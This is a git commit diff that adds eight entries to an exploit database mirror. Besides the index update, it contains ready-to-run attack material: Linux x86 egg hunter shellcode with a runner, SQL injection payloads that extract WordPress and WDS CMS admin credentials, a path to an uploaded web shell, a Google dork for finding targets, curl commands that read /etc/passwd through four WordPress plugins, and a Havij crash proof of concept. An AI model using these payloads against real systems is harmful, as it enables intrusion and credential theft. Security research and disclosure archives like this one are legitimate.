DB: 2015-08-11
8 new exploits
This commit is contained in:
parent
b6cfc9b565
commit
6bd95eb0eb
9 changed files with 278 additions and 0 deletions
|
@ -34034,6 +34034,8 @@ id,file,description,date,author,platform,type,port
|
|||
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
|
||||
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
|
||||
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
|
||||
37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
|
||||
37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
|
||||
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
|
||||
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
|
||||
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
|
||||
|
@ -34062,7 +34064,13 @@ id,file,description,date,author,platform,type,port
|
|||
37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
|
||||
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
|
||||
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
|
||||
37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0
|
||||
37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
|
||||
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
|
||||
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
|
||||
37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
|
||||
37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
|
||||
37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0
|
||||
37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
|
||||
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
|
||||
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
63
platforms/lin_x86/shellcode/37749.c
Executable file
63
platforms/lin_x86/shellcode/37749.c
Executable file
|
@ -0,0 +1,63 @@
|
|||
/*
|
||||
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
|
||||
Date: 4 August 2015
|
||||
Author: Guillaume Kaddouch
|
||||
Website: http://networkfilter.blogspot.com
|
||||
Twitter: @gkweb76
|
||||
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
|
||||
|
||||
This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).
|
||||
|
||||
Egg signature = 0x50905090 (push eax, nop, push eax, nop)
|
||||
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
|
||||
the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.
|
||||
|
||||
egg-hunter.asm:
|
||||
----------------
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
mov eax, addr ; retrieve a valid address (shorter than using JMP CALL POP)
|
||||
mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1
|
||||
inc ebx ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
|
||||
|
||||
next_addr:
|
||||
inc eax ; increasing memory address to look at next address
|
||||
cmp dword [eax], ebx ; check if our egg is at that memory address, if yes set ZF = 1
|
||||
jne next_addr ; if ZF = 0 (check failed), then jump to next_addr to check next address
|
||||
jmp eax ; we found our egg (ZF = 1), jump at this address
|
||||
|
||||
addr: db 0x1
|
||||
*/
|
||||
|
||||
/*
|
||||
myegg.c:
|
||||
-----------
|
||||
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
// Egg hunter 19 bytes (\x00 \x0a \x0d free)
|
||||
unsigned char egghunter[] = \
|
||||
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
|
||||
"\xfb\xff\xe0\x01";
|
||||
|
||||
// Print 'Egg Found!!' on screen
|
||||
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
|
||||
unsigned char shellcode[] = \
|
||||
"\x90\x50\x90\x50" // egg mark
|
||||
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
|
||||
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
|
||||
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
|
||||
int (*ret)() = (int(*)())egghunter;
|
||||
ret();
|
||||
}
|
37
platforms/php/webapps/37744.txt
Executable file
37
platforms/php/webapps/37744.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
|
||||
# Date: 20-01-2015
|
||||
# Software Link: https://wordpress.org/plugins/contus-video-gallery/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: http://twitter.com/KacperSzurek
|
||||
# Website: http://security.szurek.pl/
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
$_GET['vid'] is not escaped.
|
||||
|
||||
google_adsense() is accessible for everyone.
|
||||
|
||||
File: contus-video-gallery\hdflvvideoshare.php
|
||||
|
||||
add_action('wp_ajax_googleadsense' ,'google_adsense');
|
||||
add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
|
||||
function google_adsense(){
|
||||
global $wpdb;
|
||||
$vid = $_GET['vid'];
|
||||
$google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
|
||||
$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
|
||||
$google_adsense = unserialize($query);
|
||||
echo $google_adsense['googleadsense_code'];
|
||||
die();
|
||||
}
|
||||
|
||||
http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)
|
||||
|
||||
3. Solution:
|
||||
|
||||
Update to version 2.8
|
21
platforms/php/webapps/37750.txt
Executable file
21
platforms/php/webapps/37750.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# ( In The Name Of ALLAH )
|
||||
# Exploit Title : WDS CMS - SQL Injection
|
||||
# Google Dork : allinurl:wds_news/article.php?ID=
|
||||
# Date : 2015-08-09
|
||||
# Exploit Author : Ismail Marzouk
|
||||
# Vendor Homepage : http://webdesignskolan.se/
|
||||
# Tested on : Windows 7
|
||||
|
||||
Exploit : http://
|
||||
[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--
|
||||
|
||||
Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file
|
||||
|
||||
Shell Path : http://[Target]/wds_news/filer/shell.php
|
||||
|
||||
|
||||
# #### #### #### #### #### #### #### #### #
|
||||
# Facebook Profile : www.fb.com/ism.marzouk
|
||||
# #### #### #### #### #### #### #### #### #
|
||||
|
||||
Good Luck ^__^
|
24
platforms/php/webapps/37751.txt
Executable file
24
platforms/php/webapps/37751.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
Title: Remote file download vulnerability in wptf-image-gallery v1.03
|
||||
Author: Larry W. Cashdollar, @_larry0
|
||||
Date: 2015-07-17
|
||||
Download Site: https://wordpress.org/plugins/wptf-image-gallery
|
||||
Vendor: https://profiles.wordpress.org/sakush100/
|
||||
Vendor Notified: 0000-00-00
|
||||
Vendor Contact: plugins@wordpress.org
|
||||
Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
|
||||
Vulnerability:
|
||||
The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files:
|
||||
|
||||
|
||||
1 <?php
|
||||
2 error_reporting(0);
|
||||
3 $homepage = file_get_contents($_GET['url']);
|
||||
4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
|
||||
5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
|
||||
6 echo $homepage;
|
||||
7 ?>
|
||||
|
||||
CVEID:
|
||||
OSVDB:
|
||||
Exploit Code:
|
||||
• $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
|
31
platforms/php/webapps/37752.txt
Executable file
31
platforms/php/webapps/37752.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
|
||||
Author: Larry W. Cashdollar, @_larry0
|
||||
Date: 2015-07-13
|
||||
Download Site: https://wordpress.org/plugins/recent-backups
|
||||
Vendor: https://profiles.wordpress.org/andycheeseman/
|
||||
Vendor Notified: 0000-00-00
|
||||
Vendor Contact: plugins@wordpress.org
|
||||
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
|
||||
Vulnerability:
|
||||
The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used
|
||||
to download sensitive system files:
|
||||
|
||||
2 $file = $_GET['file_link'];
|
||||
3
|
||||
4 if (file_exists($file)) {
|
||||
5 header('Content-Description: File Transfer');
|
||||
6 header('Content-Type: application/octet-stream');
|
||||
7 header('Content-Disposition: attachment; filename='.basename($file));
|
||||
8 header('Content-Transfer-Encoding: binary');
|
||||
9 header('Expires: 0');
|
||||
10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
|
||||
11 header('Pragma: public');
|
||||
12 header('Content-Length: ' . filesize($file));
|
||||
13 ob_clean();
|
||||
14 flush();
|
||||
15 readfile($file);
|
||||
|
||||
CVEID:
|
||||
OSVDB:
|
||||
Exploit Code:
|
||||
• $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
|
43
platforms/php/webapps/37753.txt
Executable file
43
platforms/php/webapps/37753.txt
Executable file
|
@ -0,0 +1,43 @@
|
|||
Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin
|
||||
Author: Larry W. Cashdollar, @_larry0
|
||||
Date: 2015-07-16
|
||||
Download Site: https://wordpress.org/plugins/simple-image-manipulator
|
||||
Vendor: https://profiles.wordpress.org/kevartpatel/
|
||||
Vendor Notified: 2015-07-16
|
||||
Vendor Contact: plugins@wordpress.org
|
||||
Description: Manipulate your wordpress images using slider and tickboxes.
|
||||
Vulnerability:
|
||||
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location:
|
||||
|
||||
|
||||
14 /* Figure out the MIME type | Check in array */
|
||||
15 $known_mime_types=array(
|
||||
16 "pdf" => "application/pdf",
|
||||
17 "txt" => "text/plain",
|
||||
18 "html" => "text/html",
|
||||
19 "htm" => "text/html",
|
||||
20 "exe" => "application/octet-stream",
|
||||
21 "zip" => "application/zip",
|
||||
22 "doc" => "application/msword",
|
||||
23 "xls" => "application/vnd.ms-excel",
|
||||
24 "ppt" => "application/vnd.ms-powerpoint",
|
||||
25 "gif" => "image/gif",
|
||||
26 "png" => "image/png",
|
||||
27 "jpeg"=> "image/jpg",
|
||||
28 "jpg" => "image/jpg",
|
||||
29 "php" => "text/plain"
|
||||
30 );
|
||||
31
|
||||
32 if($mime_type==''){
|
||||
33 $file_extension = strtolower(substr(strrchr($file,"."),1));
|
||||
34 if(array_key_exists($file_extension, $known_mime_types)){
|
||||
35 $mime_type=$known_mime_types[$file_extension];
|
||||
36 } else {
|
||||
37 $mime_type="application/force-download";
|
||||
38 };
|
||||
39 };
|
||||
|
||||
CVEID:
|
||||
OSVDB:
|
||||
Exploit Code:
|
||||
• curl -sk "http://server/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
|
34
platforms/php/webapps/37754.txt
Executable file
34
platforms/php/webapps/37754.txt
Executable file
|
@ -0,0 +1,34 @@
|
|||
Title: Remote file download vulnerability in candidate-application-form v1.0 wordpress plugin
|
||||
Author: Larry W. Cashdollar, @_larry0
|
||||
Date: 2015-07-12
|
||||
Download Site: https://wordpress.org/plugins/candidate-application-form
|
||||
Vendor: https://profiles.wordpress.org/flaxlandsconsulting/
|
||||
Vendor Notified: 2015-07-12
|
||||
Vendor Contact:
|
||||
Description: This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
|
||||
Vulnerability:
|
||||
The code in downloadpdffile.php doesn't do any sanity checks, allowing a remote attacker to download sensitive system files:
|
||||
|
||||
<?php
|
||||
2 $file_name = $_GET["fileName"];
|
||||
3 $path = $_GET["fileUrl"];
|
||||
4 $fullfile = $path.$file_name;
|
||||
5 if (file_exists('../../uploads/candidate_application_form/'.$file_name)) {
|
||||
6 header('Pragma: public'); // required
|
||||
7 header('Expires: 0'); // no cache
|
||||
8 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
|
||||
9 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ('../../uploads/candidate_application_form/'.$file_ name)).' GMT');
|
||||
10 header('Cache-Control: private',false);
|
||||
11 header('Content-Type: '.'application/pdf');
|
||||
12 header('Content-Disposition: attachment; filename="'.basename('../../uploads/candidate_application_form/'.$file_ name).'"');
|
||||
13 header('Content-Transfer-Encoding: binary');
|
||||
14 header('Content-Length: '.filesize('../../uploads/candidate_application_form/'.$file_name)); // provide file size
|
||||
15 header('Connection: close');
|
||||
16 readfile('../../uploads/candidate_application_form/'.$file_name); // push it out
|
||||
17 exit();
|
||||
18 }
|
||||
|
||||
CVEID:
|
||||
OSVDB:
|
||||
Exploit Code:
|
||||
• $ curl http://server/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
|
17
platforms/windows/dos/37747.py
Executable file
17
platforms/windows/dos/37747.py
Executable file
|
@ -0,0 +1,17 @@
|
|||
#!/usr/bin/env python
|
||||
#Exploit Title:Havij Pro Crash POC
|
||||
# Tested:windows7
|
||||
#Sofrware Link:http://www.itsecteam.com/
|
||||
#Version:1.17
|
||||
#Email:i_7e1@outlook.com
|
||||
#Author:M1x7e1@Safeye Team
|
||||
#run python poc.py
|
||||
#copy content to target
|
||||
#click Analyze
|
||||
|
||||
## EDB-Note: tested and verified using version 1.6 Pro
|
||||
|
||||
content = “\x41” * 8000
|
||||
file = open(“xx.txt”,”w”)
|
||||
file.write(content)
|
||||
file.close()
|
Loading…
Add table
Reference in a new issue